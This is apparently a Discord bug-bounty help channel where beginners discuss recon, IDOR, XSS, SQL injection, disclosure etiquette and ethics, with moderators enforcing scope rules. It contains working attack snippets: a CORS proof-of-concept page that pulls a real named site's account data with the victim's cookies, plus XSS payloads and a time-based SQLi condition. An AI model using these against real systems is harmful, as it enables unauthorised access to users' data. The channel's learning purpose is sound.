#bug-bounty
No problem at all
Idk I was really nervous, I am thinking of sending them a message asking them to reach the security team to inform them about a potential risk I found by accident that could lead to severe disclosure
@fast fable
it's lovely that you are concerned, but all you can do is just alert them about it - due to the nature of them having no VDP, you can't do anything else
have to move on
it can also be /.well-known/security.txt
When security vulnerabilities are discovered by researchers, proper reporting channels are often lacking. As a result, vulnerabilities may be left unreported. This document defines a machine-parsable format ("security.txt") to help organizations describe their vulnerability disclosure practices to make it easier for researchers to report...
22xks
I believe it should be /.well-known/security.txt yes
if I'm not mistaken that's what the rfc says
Yup, I linked the RFC above
@sacred prism please do not post random IP addresses and ask people to hack it. If this happens again you will be banned
Oh my bad. Won’t post again.
Hi all, I am trying bug bounty but so far not getting the bug or even the bounty, so I'd like to share my methodology and I am thinking of improving it with your help (newKid)
- subdomains: sublist3r / Amass sometimes - find some subdomains, any possibility of takeover
- XSS, but most of the sites come with XSS protection nowadays so it's very hard - without protection I will use some wordlist on the particular area using Burp to find out, but nothing comes out
- IDOR, trying IDOR but mostly UUIDs nowadays
- CSRF, added as out of scope
so any other technique or method or any type of bug that's easy for beginners, please let me know; I will try something other than this. What can I try? Thanks
For subdomains, use a tool like Aquatone or Gowitness to get screenshots of the websites. IDOR can still exist with UUIDs. Create two accounts to do A/B testing, then the only problem you'll need to solve is how you can get another user's UUID. XSS is lucrative, and can work in different contexts so always look at sources and sinks.
Focus on logic-based access control vulnerabilities. Is User A able to view/change/delete User B’s data?
Sure thanks 🙏🏻
Gave +1 Rep to @lilac spindle (current: #24 - 349)
Any tips to weaponize open redirect and have a high impact ?
Can you redirect to a JavaScript URI?
Or, a GET request that performs an action on the site when logged in
Hi guys
I have got a host header injection in a dummy website but now I want to get SSRF. What's happening is that in the response content.html is being concatenated onto the payload and that's why it's not working
Any suggestions here please?
For subdomains you can try Wayback Machine data. Just don't trust the status code in the output from tools. Try to check the interesting subdomains manually.
For XSS, try to find where your data is reflected on the page/DOM.
For IDOR, don't just check for user ID. There are lots of IDs used on web apps, like order ID, address ID.
And you can try VDPs first to find valid bugs and grow your confidence.
Hi all, one doubt: let's say I have two users A and B, and I can view their info in an API. If I set user B's sessionId and session to user A and I still get user B's info on that API, does that mean it is vulnerable?
note: user A and user B are in different profiles
I would have thought it would be vulnerable if user B could get user A's info. User B still getting their own info when trying someone else's credentials is what we would want, no? (I could be wrong, I'm new here)
Try requesting a user C. If that works then yes.
Make sure not to request it first so that it isn’t cached or anything
Depends on the info though.
Thanks Jared
Gave +1 Rep to @lavish hollow (current: #6 - 1189)
Thanks Moros, no worries I am also new here 👍
this script:
<html>
<body>
<h2>CORS PoC</h2>
<div id="demo">
  <button type="button" onclick="cors()">Exploit</button>
</div>
<script>
// Cross-origin request sent with the victim's cookies. This only works if the
// target reflects the attacker's Origin in Access-Control-Allow-Origin and
// also sends Access-Control-Allow-Credentials: true.
function cors() {
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // alert() returns undefined, so its result must not be assigned to
      // innerHTML; pop the response, then write it into the page
      alert(this.responseText);
      document.getElementById("demo").innerHTML = this.responseText;
    }
  };
  xhr.open("GET", "https://www.compass.com/account", true);
  xhr.withCredentials = true; // include the victim's cookies
  xhr.send();
}
</script>
</body>
</html>
what is the point of bug bounty (from the company perspective) when the program forbids utilizing common vulnerability types like csrf, brute forcing etc?
not paying for QA
They are looking for bugs that can cause serious damage that they aren't aware of, something like brute forcing will get reported so many times from automation scanners etc and the risk isn't that high most of the time
So not really worth the hassle
@fallen palm Please don't post a target link, as it is not a THM room.
sorry
reply from hackerone:
Thanks for your report. Based on your initial description, there do not appear to be any security implications as a direct result of this behaviour.
This is expected behavior — if you have another user’s session information/token, you should be able to hijack their session.
If you disagree, please reply with additional information describing your reasoning. Including a working proof-of-concept is the best way to convey the impact of this report and will streamline our assessment of your claims.
expected behavior ? , is this true
You could make an argument that there are additional steps they can take to make the hijacking harder, but I think unless you can provide a proof of concept where you can steal some user's session token (without having it from owning the other account), they won't bother.
I don't get how do people find so many vulnerabilities, I've started looking at some VDPs, and even websites that literally have no account feature (just static sites with a form to subscribe for something) have already dozens of reports submitted. How do I know if it even makes sense for me to participate in VDP? It feels like you have to really be a pro to find anything "in the wild"
The difference is you’re hunting in public programs while they hunt on private programs.
Then there’s also people who have automation set that when a new program goes public they instantly run scanners and tools to get those easy low hanging fruits.
I'm talking about public programs though
I mean - I don't even understand where these websites could have so many vulnerabilities, sometimes it is just a static website/blog with contact form and that's it
I get that I'm a beginner so I don't know much beside basics like SQLi, XSS, IDOR, broken access control etc, but still
maybe I'm missing something
The vulns still need to be triaged, those can be just BS vulns that people submit with no real impact, so its hard to gauge if all of those are BS or legitimate.
How do we implement CSP in Odoo 10 without unsafe inline and unsafe eval ?
Hello, does anyone know who does raw bug bounty on targets on YT, a Discord server or Twitch to watch and learn? I want to see their methodology, so if anyone knows please do let me know. 😄
i guess nobody does bug bounty live since the point of bug hunting is to disclose vulnerabilities privately
NahamSec on youtube does some live stuff, mainly recon id assume
haven't watched much of his stuff as I'm nowhere near jumping into bug bounty yet, but he's been on my periphery
should i report a bug just if it allows brute force password attacks or do i need to crack it first?
theres also rs0n
Are you checking the scopes for bugbounties?
I'm sure there are some which don't allow bruteforcing
its in the scope and bruteforcing is allowed
How does the bruteforce happen? Is it on a login page?
I’d say its a valid finding.
Ok
hello guys
are exposed sensitive files like config files, .git considered pentesting? since they are already exposed by the server!
What do you mean? Is this doing bug bounty on a program?
no was trying to tell someone he has exposed files so he takes care
hey people, look what I found: German hacking event, first prize 1500 €. https://nis-2-congress.com/talentwettbewerbe/bester-pentester/ if you are German and born after 1985
Hey!
So I am exploiting a time-based SQLi. For this I am using cluster bomb to find each character of a password string.
The problem is that it is getting impossible for me to find a way to let Burp Suite know not to send any more requests for an already found, brute-forced character
From the response time I can manually see which character is at what position but burp suite doesn't know this
A thing I could do is write a script but I am not confident enough
Can someone help please?
Due to this more responses than necessary are being sent and it's also time-consuming
Try to create a condition to find the length of characters
Well, the website is vulnerable to time based SQLi so the number of characters won't change while changing conditions in the query.
I'm not sure what you mean. What I'm trying to say is you add in a condition to check the length of what you're trying to retrieve. For example, AND IF (length(database ()) =1, SLEEP (5), 1) -> This query checks if the length of the database name is 1 character.
You iterate over this till you get something successful, then you have your character length. Now, just bruteforce the amount of characters you found. If the length is 5, just stop after 5 characters.
Or use a binary search and save yourself a tonne of time rather than iterating over it...
Ohh, I have already retrieved the length of the password
The only way to dump the contents of the database is by retrieving each character one at a time and checking if the condition for that character is true
Again, binary search should speed that up
Title: DOM-Based XSS (Prototype Poisoning) Vulnerability in ‘/home/search-results' Page
Description:
This report addresses a vulnerability of DOM-Based XSS (Cross-Site Scripting) attack via Prototype Poisoning. This occurs when a script takes user supplied input and passes it to a property, which has been overridden by an attacker. The attack manipulates JavaScript's prototype-based inheritance, leading to arbitrary JavaScript code execution within the user's browser.
Location:
The vulnerability was identified on the ‘https://www.target.com/home/search-results’ page.
Exploitable in both search input fields on the page.
Steps to Reproduce:
Visit the vulnerable page.
Utilize DOM Invader to inject a JavaScript canary string into the DOM, thus poisoning prototypes.
POST JavaScript payload in search query.
Evidence:
Two sinks were found to be vulnerable to this attack:
setTimeout (prototypepollutionhitCallback)
element.innerHTML (<style type="text/css"></style>)
The page contains two search fields to query for articles on the site. Using the Prototype Poisoning technique, a canary string was used to identify potential DOM-Based XSS vulnerabilities. On page load, both of these sinks are triggered and are immediately exploitable with no further stages needed, other than modifying the canary string to execute arbitrary Javascript code.
In this case, the first XSS injection was of the function alert('DOM-based XSS successfully exploited!') upon the setTimeout prototype pollution, to trigger an alert function within my own browser. From this point, an attacker in this position would have the opportunity to leverage this much further.
[image1.png]
I decided to reproduce on the same page, to ensure this wasn’t just an edge case or a cosmic ray :)
[image2.png]
Impact:
This vulnerability is high risk, as it allows an attacker to execute arbitrary JavaScript code in the user's browser. This can potentially lead to the theft of sensitive information, such as session cookies, and allows the attacker to perform actions on behalf of the user.
Recommended Mitigation Steps:
To mitigate this vulnerability, it is recommended to:
Validate, filter, and escape user input before using it as a source in your scripts.
Identify the sources of user input and the sinks where this input ends up.
Implement a strong Content Security Policy (CSP) to reduce the impact of any potential XSS vulnerabilities.
Regularly update and patch all systems to protect against known vulnerabilities.
Consider using frameworks that automatically escape XSS by design, such as React JS.
Ignoring such vulnerabilities may lead to serious security breaches and a loss of trust from your users.
Looks good, you can also add in using vetted third party libraries such as DOMPurify to handle those cases but that's just my opinion.
One thing I’d like to point out though that while the impact is true for XSS, try to relate it with their application. Like what can you do after you steal a session? Can we do some nasty stuff with it? Etc.
Like for example, if its a banking app, can you transfer funds from other users to your account?
That’s great thank you for that. They’re a very large company in my country, website is bound to have high traffic count and also boasts a shop on the website. I’ll reference that too! Thanks again! 
So happy to get my first bounty
Hello everyone, if a target is using PHPSESSID as a cookie is it safe or is there any chance to manipulate that ?
If you can get XSS and the cookie isn't httpOnly you could get account take over with it
@fast fable sure , someone suggested to try to find the pattern this cookie is based on do you have any idea about how it's created ?
Not feasibly possible, it's a hash of a range of items like the IP, timestamp etc
@fast fable oh ok, so i should focus on xss instead of trying to crack that thing
it's not fixed anyway; when I log out and log back in it changes for the same user
See if you can use the old value when it changes
yeah ill try that
so what i noticed is that whenever you log in it changes but when you log out it doesn't
I logged in, copied the current one, changed it to the older one and it logged me out. When I put the copied one back in I'm logged in again. Is this normal behavior?
that's how session cookies work
@fast fable simply: I log in and change the cookie, the account logs out; when I set the original one I logged in with, it logs me in
i guess it's not an issue like @lilac spindle said
that is precisely what Mknukn said?
hello, I found an XSS. The WAF is blocking me when I put () or ``, but it doesn't block me when I put something like this <img src=x onerror=alert(636 /> nor when I put []. Is there any bypass for this?
what is the best bug bounty platforms for beginner?
Quick question, If you are able to bypass an admin panel but all thats behind it is defunct/non working features is that still worthy of a report?
I want to ask a question. I participated in a bug bounty program, I wrote a bug bounty report and sent it, but my report was answered negatively. I placed an XSS payload in the report content's HTML source code. Afterwards I placed the document.cookie function in the payload and I saw positive results, and I reported it. Why was my report rejected? Isn't this a weakness?
Was the issue included in the program scope or any explanation provided as to why it was rejected?
Hey
If I found a Heroku Api Key in a JS file what can I do with it ?
Lots of my brothers are asking me what to do after finding secret keys, so here you go guys...
use this bash script and check whether all the API keys are valid or not; after that you can report 🙂
Yea I’ve been using this for a while, shame it doesn’t support input files tho. Find it gets tedious pretty fast
When I manage to find a dump of 50k+ api keys, testing single entries are a nightmare. Tbf I should just make something to do myself 😂
if I'm able to bypass the captcha test, would that be considered a vulnerability?
I mean that makes them way more vulnerable to botting, right?
(Turned off ping because im a new hacker and would rather let someone more knowledgeable ping you with the answer)
Depends on the functionality its applied on being used
Think of it further; what can happen if this captcha is bypassed? Is there other ratelimiting in place that will lower its impact, etc.
Blind XSS is just being able to execute scripts to be rendered on a page that you don’t have access to
Using callbacks from things like xsshunter will help you find hits with blind
Just need a domain to point it to
And an smtp if you wanna be fancy
So imagine you have an order portal on a website. You find you can break out of an element in the input field of your payment details or delivery notes. You inject your xss payload into that. The staff who view that page with the delivery note on will get hit with the xss
XSSHunter will notify you of any hits
Really useful with Hunter as it also records the dom at the time of execution
Meaning you can get easy escalations to sensitive information exposure
Blinds are a great way to get P1’s
this should help you, really good video on blind - goes over everything i mentioned https://www.youtube.com/watch?v=MjtMLbRw0lI
XSS Hunter:
https://github.com/mandatoryprogrammer/xsshunter
Trufflehog XSS Hunter
https://xsshunter.trufflesecurity.com/
Wow
I watched this video before You even list it
Nahamsec is the best in bug bounties
thank you
Gave +1 Rep to @surreal karma (current: #616 - 6)
hi
every time i turn foxyproxy on in firefox tell me this
its very annoying
i cant intercept anything in burp suite
You need to add burp certificate to firefox
Oh well done
I'm on a website that is very hard to run XSS on
I'm ethical btw and it's an official HackerOne bug bounty program
Quick tip: don’t go in looking for specific vulns, you give yourself a harder job.
Map out a threat model for your target, the vulns will come to you once you get an idea of the lay of the land that you’re targeting
Ask yourself, what is the target, what information will they have, what information is important/sensitive, then find out how they handle user interaction, how is data stored & received, where is it stored n received etc
Work your way in with your scopes set
Enumeration is key, find secrets, improper access control, leaked information, api endpoints etc
nmap?
i can now inject xss code in password query
Also maybe dont send session info here
@long dagger if you're doing an active bug bounty, that's fine, but please don't share any URL's etc.
ok im sorry
im sorry
hi guys, I'm currently trying some VDPs and I found a JWT that possibly reveals information about the user
do I submit a report for this or not? and it's not just that cookie, there are a lot of them
If when I inject an XSS payload "><img src=x onerror=alert(document.domain)>{{7*7}}' it tells me 500 Internal server error can I do something with this ?
I think that means the injection is handled
I'm not very professional in bug bounty
So try to google it
here is a quick bug
in one of Google's Easter eggs, Google Doodle, there is an NPC in one of the doodles; when you talk to a specific NPC, then go to some trophy thing and interact, you get what the NPC says and
then...
YOU GET THE HINT THAT THAT NPC GAVE YOU (I had some grammar mistakes on this part)
here is another glitch (not a bug): I created a glitch in the terminal to create my own terminal features
I found a vulnerability that allows me to leak other users first names using their email address. The first names of the other users is inaccessible from the site. Is this enough to report?
I justify it like this:
Can lead to Phishing and Other further Attacks:
Attackers can utilize the leaked names of users to send more convincing phishing attacks to their email address
While the immediate impact might seem minimal, this vulnerability could potentially be combined with other vulnerabilities or data sources to do further damage
Privacy Breach:
First names are considered personal information and their unauthorized disclosure violates user privacy
Reputational Damage:
Any breach of privacy damages the reputation of the affected organization. Users expect their personal information to be handled securely
Yea, i would say it’s worth reporting as it will come under unauthorised disclosure
Zord:
q = GqlQuery("SELECT * FROM ArtistFan WHERE artistid = :artistid ORDER BY " + sortby + " OFFSET " + str(offset),artistid = artistid)
BadQueryError: Parse Error: Invalid ORDER BY Property at symbol '
Found this error through a GET request. Any idea how it can be exploited
can someone help me with this XSS </TITLE><SCRIPT>alert("XSS");</SCRIPT>? whenever I put this the website accepts it but it doesn't show an alert
have you whipped out inspect element to make sure its actually being embedded
if the text isn't shown in inspect element does that mean it isn't a reflected XSS??
yeah I checked the inspect element and its there I can see the payload that I used </TITLE><SCRIPT>alert("XSS");</SCRIPT>
I did it didn't open @fast fable
Can you show a ss
yea
every time I put the payload it returns this
@fast fable
I got it
I have a question
@fast fable
Just ask
k
this right here
if it's not being executed it's not xss
no I mean like if the payload I put isn't anywhere to be found in inspect element, does that mean it isn't an RXSS?
Sure
Does anybody have a recommended template for submitting bug bounties for android or in general for bug bounties?
Bro I are hacking subdomains of apk?
The sentence doesn't make sense.
I ask if you did a search for vulnerabilities
on an Android APK domain
@austere rapids Enough, please just start learning on tryhackme before attempting bug bounty
what is the best platform or course to learn bugbounty cert doesnt matter for me as much as gaining the actual skill to start hunting on platforms like bugcrowd and hackerone
there isn't one "best" but PortSwigger Academy is definitely up there https://portswigger.net/web-security
thank you
Gave +1 Rep to @acoustic ore (current: #833 - 4)
I'd also recommend HTB Academy's bug bounty path. It's not free, but it is very good information. THM also has a web exploitation path I think
already enrolled in htb soc path and its great
yeah, they have a good one for bug bounty too
I just watch some random videos on YT
I didn't know this course. Does it give you a cert?
Idk about certs but it definitely covers most of the stuff you would need when doing real-world bug bounty and it's very interesting in general (very up to date with the addition of race condition labs)
thanks man , good to know tbh
Gave +1 Rep to @acoustic ore (current: #709 - 5)
Good luck with that!
yeah, I'm getting bored with eJPT because my mom gifted it to me
so yeah
i can give this course a try meanwhile i do eJPT
anyway is this even better than CBBH?
how much is ejpt course + exam ?
I think 220 bucks
Hello, I am new in this bug bounty field. I have submitted two reports on hacker1 but they weren't valid. I have taken many courses on practical bug bounties. but I am stuck after the recon part. What should I do?
Dont quit bro iam stuck on this too
what type of bugs are you reporting
after recon, identify all functionalities, think what attack is possible on that functionality and test it, do it until all functionality is tested
once I reported an information disclosure bug but it was not applicable (funny part is, the day I reported it, they fixed it) and the second was CORS which they set to be informative.
mostly I do these recons
Guys, I am doing bug bounty on a domain and this is a sample request I intercepted using burp, I think this request takes a query parameters and then on the backend makes another request by adding the query parameters from the original request to another request:
Request: GET /abc-service/abc/profile/getOrganization?empId=499000%20%20+&1=2
Here, the thing is, 499000 is the empId, but if I add whitespace or an addition operator or an ampersand (&) in the query parameter's value then it gets accepted and a response is shown, but if I provide anything else it results in an error. First I thought there might be a chance of SQLi, but it returns an error on other characters..
How can I move forward from here?
there is a cert you can take on the coursework
We won't be proving active help on bug bounties.
Providing
Hi, is there any certification I can take as a bug bounty beginner?
Complete all web fundamentals
Check out portswigger academy too, they have some really useful stuff. Labs too, give yourself a challenge :)
Hey, if my Burp Suite is detecting "Cross-origin resource sharing: arbitrary origin trusted", does anyone know how to exploit it?
:Dd look into the new room. this is not necessarily a security issue
question for bug bounty hunters , do you always use burpsuite?
Not always.
OWASP ZAP is an adequate alternative.
Thank you
Gave +1 Rep to @unborn ice (current: #1 - 2187)
would you guys put your real name and linkedin profile in a big company hall of fame page, as a reward for a reported bug?
do you have professional one?
No
Yeah I believe it's possible, but I am both wondering about possible benefits of having my linkedin there (although I stil don't have a security profile to show to recruiters)
Yes.
You're allowed.
IIRC Frostbite is in the Microsoft Hall of fame as his discord handle.
May be wrong, can't find them to ping.
yeah there's plenty of aliases from what I can see
Placing your LinkedIn would be only useful if people read it periodically.
So you think you'd avoid using real name?
Depends on your opsec.
@hollow thistle I'd probably put my aliases in and then mention it in my CV
Where do you use ZAP instead of burp?
Oh that's an option that didn't cross my mind 😯
When I can't use burps Pro features
Any specifics?
Hey umm a doubt, what if I report that a website is running a much lower version? For example there is a website which is using jQuery version 3.3, which has a couple of vulnerabilities. As a rectification for that vulnerability it should be upgraded to version 3.5.
What will happen if I submit this as a bug?
depends on the impact of the jQuery version and if it's directly exploitable
but usually there's not much impact afaik, there are a lot of niche bugs I think on that version but not much to be worried about
It is mentioned that it gives stored XSS, however when I tried I failed.
But the jQuery version is the one which was used in the PoC
judging by what i've read on HackerOne's programs scopes they are not accepted unless you have a POC exploiting them
Unless there is a way to exploit it, if you just submit an outdated version you will just get an informational
Okk. Thanks for the input..
Hi everyone, I had a doubt: when exploring my targets, the subdomains that I have to look for are those that are in scope, but why do some hunters use subdomains in gobuster, subdomainfinder, dirsearch etc. mmm???, shouldn't I just look for what's in scope???
sometimes the scope can be *.example.com which means all subdomains under example.com.
Oh ok got it
And these subdomains, why are they hidden?
not sure i understand what you mean
No, l I already got , thx
Gave +1 Rep to @lilac spindle (current: #22 - 366)
why do you use nmap rather than other fast scanner tools?
PortSwigger is good to learn vulns
I have no idea about other scanners.. almost all the videos/blogs I have seen used these .. so I picked one from category ..
yeah .. I am using it too... sometimes ..
the problem with nmap is that it's slow; there are other tools like naabu that do the same as nmap but faster
Rustscan
oh okay ..
I use that for solving THM rooms, didn't know it can be used here
Okay
Why would you want to perform a fast network scan of live systems?
That's rhetorical. It's because you're impatient and want results quickly, but haven't considered the possible implications of hitting your target with a lot of traffic quickly.
There's a reason that nmap is still the standard in industry despite faster options being available -- it's because denial of service attacks are nearly always out of scope (both for pen tests and bug bounty), and if the target isn't properly protected then you are significantly more likely to bring it down by hitting it hard.
Also significantly more likely to cause an incident in their SOC which is a waste of a lot of people's time.
i.e. it's reckless, stupid, and shows a dangerous lack of experience of testing in a real world context.
So, that looks good -- including Nmap.
Order looks a little interesting, but 🤷♂️
but what ...
The order may depend on what you have found. You can either continue or keep enumerating.
So no biggie
But shrug.
Basically just an open ended "possibly not the best order to approach it, but if it works for you then fine"
well at this stage I am still looking whats gonna work for me
trying every methodology.. all the orders
For web, I'd start with Google dorking and then look for subdomains. Then perhaps directory searching.
Before fuzzing, you can look at the web archive. Less effort and less noisy
fuzzing is mainly for directory search right? or does it help with much more!!
Yeah, and for subdomains. Don't forget to rate-limit it though
Why do you use Google dorking?
To find hidden (not really) documents & pages
Any good try hack me pages to improve on google dorking?
There is 1 or 2.
because I don't want to wait a month to scan more than 200 subdomains with nmap. Also in naabu you can select the rate limit you want
So, impatience reeking of recklessness. Wonderful.
Setting a rate limit for it is good, but at that point you're removing the "benefit" of using a faster tool lmao.
hello
need some help: I have an admin panel here, I typed admin:admin and it said "nice catch try harder" with some GIF. Kindly help me
Is this for TryHackMe?
no, another challenge
Which other challenge? 🙂
Then we can't and won't help you.
"given by someone" doesn't exactly fill me with confidence that what you're doing isn't something you're being tested on.
no no its not that can i dm you ?
Not at all.
Cheating of any form is not allowed. This is not limited to asking for help with assessed schoolwork or exams.
I see it as it's your work, and not ours.
I just saw a post very similar to that one posted in the TCM Security discord. 😅
why are path traversal bugs so popular all of a sudden?
hey guys, i pushed this question on another channel, and a helpful mod told me to ask here
that said
has anyone here done bug bounties before? going for a sanity check, but what is some down-to-earth advice you can give for someone potentially starting on bug bounties? it seems like a promising side hustle, but i like to believe such things don't come easy
in addition to, what is some prerequisite knowledge i need? i need to checklist if im ready for this sort of thing
i also need some statistics! for the much more experienced bug hunters, how many successful submissions do you get in a month or a year?
How I would approach this would be to pick a topic here https://portswigger.net/web-security/all-topics , learn about a specific bug (xss or idors for example), then once you are done with the labs put that newly acquired knowledge to use on a VDP . You will have less competition on a VDP compared to a BBP. Get some valid submissions on a VDP, that will boost your rep, and also unlock the potential for private invites, which will also have less competition on them. After about a month of hacking/ hunting go back to portswiggers and learn a new vuln, rinse and repeat...
Also I wouldn't go in with the mind set that you will make a living off bug Bounty, I would do it for the knowledge itself and the money will follow...
There are also several bug hunting checklists out there, google will be your best friend for this
Even if you get dupes, you're still finding bugs
this is great advice!!
yeah i was talking to professional in the red team field a week or two ago
and he suggested bug bounties as a good project to make my resume stand out
while the money is
im mostly just there to learn. cash is just a bonus
Me personally I like to hunt on programs with wildcard domains in scope, there's a good chance you could find something that nobody has tested yet, and then there's easy wins... I would also create 2 accounts on the program I'm hunting on, for when I'm searching for idors... Creating an account will also unlock additional features that can be tested.
One last thing, when you find something and you go to report your findings, make sure you can actually exploit the bug... For example you think you've found an account takeover, actually take the account over, otherwise it could be marked as informative and you'll miss out on any rep or money associated with your bug... Think what's the worst thing that could happen if a malicious actor found this bug and then try to see if you can do that, unless the policy explicitly states not to...
Hey guys I need to start bug bounty, is ZAP enough?
Hey can u give advice to me too brother
Well the advice would be universal advice for any beginner looking to get into bug bounty... As far as is ZAP enough, any proxy would be good enough to start hunting.. eventually you'll want to start looking into automated recon to get leads. And maybe spinning up a VPS (using any cloud provider) to host some payloads. Here's a video on the recon process https://m.youtube.com/watch?v=Z9es1_BUXmQ&pp=ygUIbmFoYW1zZWM%3D and another for setting up a basic VPS to hack from https://m.youtube.com/watch?v=qlX5jR7Z4uo&t=329s @river kraken
📚 Purchase my Bug Bounty Course here 👉🏼 bugbounty.nahamsec.training
💵 Support the Channel:
You can support the channel by becoming a member and get access exclusive content, behind the scenes, live hacking session and more!
☕️ Buy Me Coffee:
https://www.buymeacoffee.com/nahamsec
JOIN DISCORD:
https://discordapp.com/invite/ucCz7uh
🆓 🆓 🆓 $200...
Why do I need to set up some box, can't I use a VM?
Ping me
Hey where did u go ?
At work rn... Sure you can use a VM... May want to use a VPN then, so your IP doesn't get blocked while scanning.. I guess it all depends on what you are hunting for. For some bugs you are going to need to have a way for your payload to call back, whether it's a Burp Collaborator session or a server you can control. But I think the last video will / can explain it better
Hello everyone, i am new here, and i started learning about bug bounty recently.
Currently i am learning the XSS vulnerability, do you recommend hunting through automation, or manual testing?
If manual testing is better, do i need to know a lot of JavaScript or just the basics?
Thanks!
Can you confirm the scope?
What scope?
For the bug bounty.
We have no idea what you're doing, so if you'd like help, you'd need to confirm.
It's a private program on Intigriti.
If you can't provide a scope, we can't help, and I'd like to ask for you stop asking for help also. 🙂
Ah, you're asking to see if it's illegal or not?
Pretty much.
Yup got it, thanks <3.
I'd recommend looking for xss manually, automated tools can miss a lot... You can use automation to hunt for xss but may receive false positives, so you will need to verify any automated findings. I'd recommend automation for hunting parameters, then manually test for xss on those parameters. As far as JS, the basics are sufficient to find xss but a deep dive on JS can help with more complex xss. Here's a few good xss cheat sheets https://portswigger.net/web-security/cross-site-scripting/cheat-sheet , https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
i'm taking nahamsec's intro to bug bounty course and trying to do the lab https://tryhackme.com/r/room/nahamsecsudemylabs I'm connected to the tryhackme vpn and tried using the tryhackme attack box but can't ssh into the machine. Which username and password should I use to ssh into the machine?
why would you ssh into a web site bug bounty course teaching machine??? would it not make more sense to connect using firefox in the browser
#room-help please.
Room is marked or tagged as private.
Oh bob damn it.
I forgot I can see some of those rooms.
Hey, we don't allow members to help with private rooms, as you're doing a course, please seek help from peers or whomever is teaching you.
I'm pretty sure I answered this question in nahamsec's discord also .... No need for ssh ... Start the machine and edit your /etc/hosts file, visit website...
Thank you so much @lilac bough
Gave +1 Rep to @lilac bough (current: #103 - 62)
Hello everyone, i am new and i have a question, is it a good idea to just look for XSS on my targets, as it is the only vulnerability i know at this time, and it is maybe the most common found vulnerability, thanks
I would say yes, sure you might miss out on other bugs during your testing but the thing is, once you are confident finding xss in hardened targets you can branch off and learn new vuln types. You can always go back and retest that program for the new vulns you just learned. But if you want vulns that are similar to testing for xss, you could always learn different injections like SQL, command, template, etc... or could always learn how to hunt for idors... That's a pretty easy one to spot.. honestly it's up to you though
Thank you so much @lilac bough
Gave +1 Rep to @lilac bough (current: #101 - 63)
Hi everyone, i am looking for people who are relatively new, or beginners in bug bounty to collaborate with, so maybe we can help each other, thank you everyone!
I am so new to it I haven't even gotten past the wanting to learn how to do it stage.
hi guys,
I have a question about domain security and potential vulnerabilities. Suppose a company owns a primary domain for its online services, but I noticed that similar domain names with different extensions (e.g., .ae , .co) are available for registration.
Could the availability of these similar domains pose a security risk, such as phishing or brand misuse? Any use of reporting these?
Yes, that's called typo squatting and it's a common method.
I mean they will probably mark it as informative.. so not really worth reporting.
Intercom] Launcher is disabled in settings or current page does not match display conditions
/api/v2/paths/outline?pathCode=:1
Failed to load resource: the server responded with a status of 404 ()
I have this error, how can I fix this?
it works
@ancient prism totally plausible risk. My agency used something like a substitute Latin char for some other char that looks like the same damn letter if you don't count pixels
then we do pt from that domain
What is the best way to go form doing tryhackme ctf's to getting into bug bounty? Are there CTF's geared towards learning bug bounty? Not expecting to make money more just for fun and something new to learn.
The difference between bug bounty and ctf is that during a bug bounty scope you're looking to see if there is a vulnerability.
With a ctf you're looking for something that is intentionally vulnerable to something.
Up !
Are There any CTF that are geared towards learning bug bounty or is CTF not the place to start?
I’m interested in this. It’s something I am trying to do, just not very good at it right now
Hi everyone!
Looking for experienced collaborators for Bug Bounty programs.
No beginners or amateurs, please!
Thanks in advance.
Here are a few ctf style https://mctf.io/mini-zine code=mixed . Solve 5 of the 6 challenges and get a month of free access to the entire Antisyphon Cyber Range. This is from Black Hills Info Sec.
Hackerone ctf
https://ctf.hacker101.com/
Hackinghub
http://hackinghub.io/
Nahamstore THM
https://tryhackme.com/r/room/nahamstore
And then there's portswiggers
https://portswigger.net/web-security/all-topics
The Hacker101 CTF is a game designed to let you learn to hack in a safe, rewarding environment. Hacker101 is a free educational site for hackers, run by HackerOne.
Learn ethical hacking skills with hands-on labs and education from cyber security experts.
I think the Nahamstore is really not well done, the description promises to learn the basics but there is no introduction other than that you should add the server and its subdomains to the hosts file
it requires that you already know everything, it is basically a what can you do task
Basically a ctf... I think it's a good experience since on actual bug hunting engagements you are basically in the same position, except here you know for sure this is vulnerable and to what bugs.. just need to do a little research
Combine this with portswiggers labs and you should be good to go for testing.
thanks for sharing the code with us.
Gave +1 Rep to @lilac bough (current: #78 - 79)
I found a vulnerability in Olay's system (insecure privileges) but they don't have a bug bounty program or a VDP or security disclosure page, what approach should I take to report the issue?
Ruh Roh.
You could notify their IT team, however don't even mention a reward.
However they could take action.
Should I contact them via their normal contact email?
Is there a security.txt file?
Thanks, didn't realize to look for companies above it.
Gave +1 Rep to @lilac bough (current: #78 - 80)
guys can you suggest a beginner friendly bug bounty platform
How would you rate beginner friendly?
i am a fresher in bug bounty, that's why i asked
Just my 2 cents but I don’t think there are beginner friendly platforms.
I’d say Intigriti was one of the easiest to get started in.
thank you brother🫂
hi
Guys can anyone guide me
easiest bug to find in all websites is? #bug-bounty
Stored XSS probably up there
Idors is another easy one to find... Doubt you'll be able to find an "easy" bug in "all" websites but xss and idors are probably a good place to start looking.
How is that begging to be hacked? Also they're not even validated by H1
I'm not surprised they have had to make that statement tho. I've seen a few people asking for a reward from VDPs due to not reading the scope properly
Basic VDP terminology... Generally not a lot of hunters are actually hunting on VDPs because of the lack of payments, so a good place for people trying to "practice"
But there is a debate about large companies like this using VDPs ... When they are large enough to pay for serious bugs ....
I can see smaller / start up companies beginning with VDPs but as a bigger corporation and serious reports come in you should value your company's security and invest back into it and researchers... Just my opinion... Not like they are just wasting money by paying a researcher that found a crit...
I've also heard of some bigger companies that have public VDPs that state they do not pay for bugs but also have a private program where they pay for crits ... Which is weird that some hunters could get paid while others won't (assuming they found the same bug)...
I mean, to meet compliance you get a pentest (amongst other things). Don't forget: community submissions -- be they bug bounty or VDP -- are supplementary to a proper security programme, not instead of.
it's expected that a VDP is not going to find a really significant thing, if the company participating has even a modicum of competency in their security program
Unless the thing that's found is an actual 0day
Bug bounty / VDP submissions can be really useful for being made aware of issues, 100%, but they are far less reliable than, y'know, paying a team with all the relevant qualifications to thoroughly assess the systems.
This is also very sketchy imo.
VDPs exist to give researchers legal protection to responsibly disclose findings. I do get where you're coming from with the just reward thing, but no one is obligated to give you money for something you've done voluntarily, unless they've made it explicitly clear that they are open to doing that.
Frankly, your suggestion that you should just sell the data instead of telling the company is a massive red flag. It tells us that you value money over ethics. It tells us that you are willing to compromise a company (and potentially thousands or more customers) simply because they're not willing to pay you to not do that.
Which, frankly, is scummy af.
Is it a choice between "hand them free security" and "sell their data"?
Because if so, yes, you're meant to take option A. That's what an ethical hacker does.
